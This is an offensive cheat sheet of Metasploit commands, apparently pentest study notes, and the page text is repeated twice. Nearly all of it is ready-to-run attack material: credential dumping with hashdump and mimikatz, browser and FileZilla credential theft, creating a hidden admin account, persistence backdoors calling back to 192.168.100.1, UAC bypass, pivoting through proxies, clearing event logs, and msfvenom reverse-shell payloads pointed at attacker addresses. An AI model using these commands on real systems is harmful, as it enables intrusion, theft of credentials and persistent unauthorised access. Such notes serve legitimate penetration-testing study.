Metasploit

msfconsole or msfdb run (db_status)

? for available commands

systemctl enable postgresql

at startup

show , show -h, show exploits, show payloads show auxiliary, show post etc etc

search type:exploit platform:windows

search vsftpd or cve:2007-2447 or searchsploit

Scanners or Exploits

use auxiliary/scanner/snmp/snmp_enum

show options

info

show targets

Payloads

set payload windows/meterpreter/reverse_tcp

run or exploit

Sessions

sessions [-l] showing a list of sessions

sessions -i 1 for interacting with session 1

background

Install module

Info in database

help database

hosts, services,loot,creds

services -p 443

db_nmap

workspace [-h]

workspace msfu

workspace -a new one; workspace -d deleteone

db_import nmap_scan.xml

load wmap

Post exploitation

Information [help]

ifconfig, sysinfo, pwd, getuid, ps, getpid, getprivs

search post/windows post/linux; show post

post/multi/recon/local_exploit_suggester

run post/linux/gather/enum_configs

Collects all the most vital configuration files on a system.

run post/linux/gather/enum_system

Collects system information of a system.

run post/multi/gather/

other gathering scripts

run post/windows/gather/

Lists all Meterpreter pillaging scripts.

run post/windows/gather/enum_services

Obtain all running services on a Windows machine.

run post/windows/gather/enum_domains

Determine what domains target is in.

run post/windows/gather/enum_ad_users

Enumerates accounts in active domain.

run post/windows/gather/enum_shares

Lists all shared resources on system.

meterpreter > run scraper

Runs pillage automation script.

meterpreter > run winenum

Runs Windows pillage automation script.

meterpreter > run netenum

Network Enumerator Meterpreter Script

run post/windows/gather/credentials

Searches for credentials on a system.

run post/gather/enum_chrome

Searches for credentials stored in Google Chrome.

run post/windows/gather/enum_application

Lists installed software on system.

run post/multi/gather/filezilla_client_cred

run arp_scanner –r 10.32.120.0/24

arp_scanner to identify devices within the same VLAN by IP and MAC

use post/windows/gather/arp_scanner

alternate arp_scanner to identify devices within the same VLAN by IP and MAC

use auxiliary/scanner/portscan/tcp

post module to do a port scan on a remote host

run getgui -e

Meterpreter post payload to enable RDP

Add user

net user EveUser EvePass /add

net localgroup "Administrators" EveUser /add

net localgroup "Remote Desktop Users" EveUser /add etc etc

Privileges

search post/windows

search post/windows/gather

search post/windows/migrate

search exploit/windows/local

search post/multi/gather

getprivs

run post/windows/gather/win_privs

Post module about current access privs

run post/windows/manage/migrate

To let Metasploit automatically migrate to another process

migrate

sudo -l

getsystem (only windows without UAC disabled) -> rev2self to get back to original

search bypassuac

/post/windows/gather/win_privs to see if UAC is enabled

list_tokens or impersonate_token els\els

meterpreter > background

use exploit/windows/local/bypassuac

PrivEsc to use if your meterpreter session process is in the admin group but is not an admin. After setting options go back to meterpreter and getsystem

run getsystem again -> getuid to check

use incognito

Ability to impersonate users/admins and then map network shares as them, see lab 9 (NetBios)

use post/multi/recon/local_exploit_suggester

Windows

use exploit/windows/local

exploit/windows/local/service_permissions

run post/windows

Linux

run post/linux

Shell and search

shell , exit

start the local shell; windows and linux

Search for a file

search -f pass.txt`

search -d C:\Users\els\ -f *.kdbx

-d= path -f= file pattern

Upload a file

upload /usr/share/windows-binaries/nc.exe c:\Users\Offsec`

Download a file

download c:\Windows\system32\calc.exe /tmp/calc.exe`

Persistence [backdoor, new account, password hash, software]

run persistence -h -> post/windows/manage/persistence_exe

run persistence -A -X -p 5555 -r 192.168.100.1

run persistence -A -U -i 20 -p 80 -r 192.168.100.1 -> start exploit/multi/handler to listen

Veil-evasion + metasploit

use exploit/windows/local/persistence -> show advanced -> set EXE::Custom /var/www/

Enable RDP

net start

wmic service where 'Caption like "Remote%" and started=true' get Caption

With Meterpreter

run service_manager -l or run post/windows/gather/enum_services

use meterpreter scripts to check services

run getgui -e

Meterpreter post payload to enable RDP

Add user

net user EveUser EvePass /add

net localgroup "Administrators" EveUser /add

net localgroup "Remote Desktop Users" EveUser /add etc etc

Hashdump

hashdump on windows

To bypass this error you have two options: 1) execute run hashdump or 2) migrate to a different process.

run post/linux/gather/hashdump

Example pass the hash

only works if we use an administrator account on the current meterpreter session

ms08-067 -> hashdump -> use auxiliary/scanner/smb/psexec_scanner

use exploit/windows/smb/psexec

Mimikatz

it is important to have the current meterpreter session running on a 64-bit process

extract plaintexts passwords, hash, PIN code and kerberos

tickets from memory. mimikatz can also perform

pass-the-hash, pass-the-ticket or build Golden tickets

load mimikatz, help mimikatz

From metasploit meterpreter (must have System level access):

meterpreter> load mimikatz

meterpreter> help mimikatz

meterpreter> msv

meterpreter> kerberos

mimikatz_command -f xyz:: to show list of modules

meterpreter> mimikatz_command -f samdump::hashes

meterpreter> mimikatz_command -f sekurlsa::searchPasswords

Pivoting

run arp_scanner -r network/mask [192.168.100.0/24]

run post/multi/gather/ping_sweep

Routing from Metasploit exploit

use post/multi/manage/autoroute

set session 1

run

use auxiliary/server/socks4a

set SRVHOST 175.12.80.21

adress of VPN tunnel

run

run autoroute -h

run autoroute from meterpreter session-s 10.32.121.0/24

meterpreter > run autoroute -s 10.10.10.0/24

Adds a route from Meterpreter sessions

run post/multi/manage/autoroute

run autoroute -p

Check the current routing table

use auxiliary/scanner/portscan/tcp

Scan the added network from Metasploit

route flush

Delete added route

route add target_network target_mask session#

Add a route from Metasploit

[msf > route add 10.10.10.0 255.255.255.0 2]

route print

Check the routing table

use a bind payload for the second target !

If not through metasploit but use programs from computer then also use proxychains

background

msf > use auxiliary/server/socks4a

run

echo "socks4 127.0.0.1 1080 >> /etc/proxychains.conf

edit /etc/proxychains.conf to include "socks4 127.0.0.1 SRVPORT" where SRVPORT is whatever port you chose

proxychains nmap -sT -n -Pn -p 21 10.10.10.1

proxychains telnet 10.10.10.1

Port forwarding [in addition to the added route]

meterpreter > portfwd add -l 3333 -p 3389 -r 10.10.10.5

the following command will open a listener on our local IP address on port 3333, and will forward the connection to the IP address 10.10.10.5 on port 3389

rdesktop 127.0.0.1:3333

establish an RDP session to our local IP address on port 3333

portfwd list

----------------- [+] Metasploit Pivot

Compromise 1st machine

# meterpreter> run arp_scanner -r 10.10.10.0/24

route add 10.10.10.10 255.255.255.248

use auxiliary/scanner/portscan/tcp

use bind shell

or run autoroute:

# meterpreter > ipconfig

# meterpreter > run autoroute -s 10.1.13.0/24

# meterpreter > getsystem

# meterpreter > run hashdump

# use auxiliary/scanner/portscan/tcp

# msf auxiliary(tcp) > use exploit/windows/smb/psexec

or port forwarding:

# meterpreter > run autoroute -s 10.1.13.0/24

# use auxiliary/scanner/portscan/tcp

# meterpreter > portfwd add -l -p -r <remote/internal host>

or socks proxy:

route add 10.10.10.10 255.255.255.248

use auxiliary/server/socks4a

Add proxy to /etc/proxychains.conf

proxychains nmap -sT -T4 -Pn 10.10.10.50

setg socks4:127.0.0.1:1080

Cleanup

clearev

Bypass UAC

post/windows/gather/win/_privs

You can bypass that restriction by using the bypassuac module (search uac), and then set session and run with exploit.

Msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.56 LPORT=8888 -f raw > shell.jsp

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python

PHP

msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php

msfvenom -p php/meterpreter/reverse_tcp LHOST= -o meterpreter.php

msfvenom -p generic/shell_reverse_tcp LHOST= LPORT=4444 -f php -o shell.php

-p = payload

-f = output format

-o = out

-a = architecture

-e = encoder

-i = iterations of encoder

-b = bad characters to avoid \x00\xff

--platform = platform for the payload

Multi/Handler

use exploit/multi/handler

set payload ...

set LPORT

set LHOST

exploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -f js_le

PreviousPivoting and Tunneling NextFile transfer

Last updated 5 years ago

Was this helpful?

Metasploit

msfconsole or msfdb run (db_status)

? for available commands

systemctl enable postgresql

at startup

show , show -h, show exploits, show payloads show auxiliary, show post etc etc

search type:exploit platform:windows

search vsftpd or cve:2007-2447 or searchsploit

Scanners or Exploits

use auxiliary/scanner/snmp/snmp_enum

show options

info

show targets

Payloads

set payload windows/meterpreter/reverse_tcp

run or exploit

Sessions

sessions [-l] showing a list of sessions

sessions -i 1 for interacting with session 1

background

Install module

Info in database

help database

hosts, services,loot,creds

services -p 443

db_nmap

workspace [-h]

workspace msfu

workspace -a new one; workspace -d deleteone

db_import nmap_scan.xml

load wmap

Post exploitation

Information [help]

ifconfig, sysinfo, pwd, getuid, ps, getpid, getprivs

search post/windows post/linux; show post

post/multi/recon/local_exploit_suggester

run post/linux/gather/enum_configs

Collects all the most vital configuration files on a system.

run post/linux/gather/enum_system

Collects system information of a system.

run post/multi/gather/

other gathering scripts

run post/windows/gather/

Lists all Meterpreter pillaging scripts.

run post/windows/gather/enum_services

Obtain all running services on a Windows machine.

run post/windows/gather/enum_domains

Determine what domains target is in.

run post/windows/gather/enum_ad_users

Enumerates accounts in active domain.

run post/windows/gather/enum_shares

Lists all shared resources on system.

meterpreter > run scraper

Runs pillage automation script.

meterpreter > run winenum

Runs Windows pillage automation script.

meterpreter > run netenum

Network Enumerator Meterpreter Script

run post/windows/gather/credentials

Searches for credentials on a system.

run post/gather/enum_chrome

Searches for credentials stored in Google Chrome.

run post/windows/gather/enum_application

Lists installed software on system.

run post/multi/gather/filezilla_client_cred

run arp_scanner –r 10.32.120.0/24

arp_scanner to identify devices within the same VLAN by IP and MAC

use post/windows/gather/arp_scanner

alternate arp_scanner to identify devices within the same VLAN by IP and MAC

use auxiliary/scanner/portscan/tcp

post module to do a port scan on a remote host

run getgui -e

Meterpreter post payload to enable RDP

Add user

net user EveUser EvePass /add

net localgroup "Administrators" EveUser /add

net localgroup "Remote Desktop Users" EveUser /add etc etc

Privileges

search post/windows

search post/windows/gather

search post/windows/migrate

search exploit/windows/local

search post/multi/gather

getprivs

run post/windows/gather/win_privs

Post module about current access privs

run post/windows/manage/migrate

To let Metasploit automatically migrate to another process

migrate

sudo -l

getsystem (only windows without UAC disabled) -> rev2self to get back to original

search bypassuac

/post/windows/gather/win_privs to see if UAC is enabled

list_tokens or impersonate_token els\els

meterpreter > background

use exploit/windows/local/bypassuac

PrivEsc to use if your meterpreter session process is in the admin group but is not an admin. After setting options go back to meterpreter and getsystem

run getsystem again -> getuid to check

use incognito

Ability to impersonate users/admins and then map network shares as them, see lab 9 (NetBios)

use post/multi/recon/local_exploit_suggester

Windows

use exploit/windows/local

exploit/windows/local/service_permissions

run post/windows

Linux

run post/linux

Shell and search

shell , exit

start the local shell; windows and linux

Search for a file

search -f pass.txt`

search -d C:\Users\els\ -f *.kdbx

-d= path -f= file pattern

Upload a file

upload /usr/share/windows-binaries/nc.exe c:\Users\Offsec`

Download a file

download c:\Windows\system32\calc.exe /tmp/calc.exe`

Persistence [backdoor, new account, password hash, software]

run persistence -h -> post/windows/manage/persistence_exe

run persistence -A -X -p 5555 -r 192.168.100.1

run persistence -A -U -i 20 -p 80 -r 192.168.100.1 -> start exploit/multi/handler to listen

Veil-evasion + metasploit

use exploit/windows/local/persistence -> show advanced -> set EXE::Custom /var/www/

Enable RDP

net start

wmic service where 'Caption like "Remote%" and started=true' get Caption

With Meterpreter

run service_manager -l or run post/windows/gather/enum_services

use meterpreter scripts to check services

run getgui -e

Meterpreter post payload to enable RDP

Add user

net user EveUser EvePass /add

net localgroup "Administrators" EveUser /add

net localgroup "Remote Desktop Users" EveUser /add etc etc

Hashdump

hashdump on windows

To bypass this error you have two options: 1) execute run hashdump or 2) migrate to a different process.

run post/linux/gather/hashdump

Example pass the hash

only works if we use an administrator account on the current meterpreter session

ms08-067 -> hashdump -> use auxiliary/scanner/smb/psexec_scanner

use exploit/windows/smb/psexec

Mimikatz

it is important to have the current meterpreter session running on a 64-bit process

extract plaintexts passwords, hash, PIN code and kerberos

tickets from memory. mimikatz can also perform

pass-the-hash, pass-the-ticket or build Golden tickets

load mimikatz, help mimikatz

From metasploit meterpreter (must have System level access):

meterpreter> load mimikatz

meterpreter> help mimikatz

meterpreter> msv

meterpreter> kerberos

mimikatz_command -f xyz:: to show list of modules

meterpreter> mimikatz_command -f samdump::hashes

meterpreter> mimikatz_command -f sekurlsa::searchPasswords

Pivoting

run arp_scanner -r network/mask [192.168.100.0/24]

run post/multi/gather/ping_sweep

Routing from Metasploit exploit

use post/multi/manage/autoroute

set session 1

run

use auxiliary/server/socks4a

set SRVHOST 175.12.80.21

adress of VPN tunnel

run

run autoroute -h

run autoroute from meterpreter session-s 10.32.121.0/24

meterpreter > run autoroute -s 10.10.10.0/24

Adds a route from Meterpreter sessions

run post/multi/manage/autoroute

run autoroute -p

Check the current routing table

use auxiliary/scanner/portscan/tcp

Scan the added network from Metasploit

route flush

Delete added route

route add target_network target_mask session#

Add a route from Metasploit

[msf > route add 10.10.10.0 255.255.255.0 2]

route print

Check the routing table

use a bind payload for the second target !

If not through metasploit but use programs from computer then also use proxychains

background

msf > use auxiliary/server/socks4a

run

echo "socks4 127.0.0.1 1080 >> /etc/proxychains.conf

edit /etc/proxychains.conf to include "socks4 127.0.0.1 SRVPORT" where SRVPORT is whatever port you chose

proxychains nmap -sT -n -Pn -p 21 10.10.10.1

proxychains telnet 10.10.10.1

Port forwarding [in addition to the added route]

meterpreter > portfwd add -l 3333 -p 3389 -r 10.10.10.5

the following command will open a listener on our local IP address on port 3333, and will forward the connection to the IP address 10.10.10.5 on port 3389

rdesktop 127.0.0.1:3333

establish an RDP session to our local IP address on port 3333

portfwd list

----------------- [+] Metasploit Pivot

Compromise 1st machine

# meterpreter> run arp_scanner -r 10.10.10.0/24

route add 10.10.10.10 255.255.255.248

use auxiliary/scanner/portscan/tcp

use bind shell

or run autoroute:

# meterpreter > ipconfig

# meterpreter > run autoroute -s 10.1.13.0/24

# meterpreter > getsystem

# meterpreter > run hashdump

# use auxiliary/scanner/portscan/tcp

# msf auxiliary(tcp) > use exploit/windows/smb/psexec

or port forwarding:

# meterpreter > run autoroute -s 10.1.13.0/24

# use auxiliary/scanner/portscan/tcp

# meterpreter > portfwd add -l -p -r <remote/internal host>

or socks proxy:

route add 10.10.10.10 255.255.255.248

use auxiliary/server/socks4a

Add proxy to /etc/proxychains.conf

proxychains nmap -sT -T4 -Pn 10.10.10.50

setg socks4:127.0.0.1:1080

Cleanup

clearev

Bypass UAC

post/windows/gather/win/_privs

You can bypass that restriction by using the bypassuac module (search uac), and then set session and run with exploit.

Msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.56 LPORT=8888 -f raw > shell.jsp

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python

PHP

msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php

msfvenom -p php/meterpreter/reverse_tcp LHOST= -o meterpreter.php

msfvenom -p generic/shell_reverse_tcp LHOST= LPORT=4444 -f php -o shell.php

-p = payload

-f = output format

-o = out

-a = architecture

-e = encoder

-i = iterations of encoder

-b = bad characters to avoid \x00\xff

--platform = platform for the payload

Multi/Handler

use exploit/multi/handler

set payload ...

set LPORT

set LHOST

exploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -f js_le

PreviousPivoting and Tunneling NextFile transfer

Last updated 5 years ago

Was this helpful?